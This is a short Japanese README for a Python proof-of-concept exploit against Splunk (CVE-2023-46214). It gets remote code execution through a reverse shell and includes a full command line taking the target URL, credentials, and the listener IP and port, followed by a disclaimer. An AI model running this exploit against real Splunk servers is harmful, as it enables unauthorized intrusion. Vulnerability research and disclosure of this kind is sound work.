
Splunkのadddatamethods機能を悪用してリバースシェル経由のリモートコード実行を実現する、CVE-2023-46214向けのPythonベースのPoCです。
CVE-2023-46214、SVD-2023-1104 の概念実証エクスプロイト

SplunkインスタンスのURL、ユーザー名、パスワード、リバースシェルIP、ポートはすべてコマンドライン引数として必要です。例:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
この脆弱性を発見するために用いた方法論を詳述したブログ記事を書きました。スクリプトで問題が発生した場合、手動での悪用手順が詳述されているブログが役立つかもしれません。
このリポジトリで提供される概念実証(PoC)スクリプトは、教育および研究目的のみに提供されます。その目的は、特定の脆弱性を示し、関連するセキュリティリスクの理解を助けることです。
このスクリプトを、不正なシステムアクセス、不正なテスト、その他の不正使用などを含むがこれらに限定されない、許可されていない活動に使用することは、明確に禁止されています。
このリポジトリの作成者および貢献者は、このスクリプトの不適切な使用、またはこのスクリプトの使用に起因するいかなる損害や害についても、一切の責任を負いません。このスクリプトを使用することにより、あなたは責任ある方法で自己責任において使用することに同意したものとみなされます。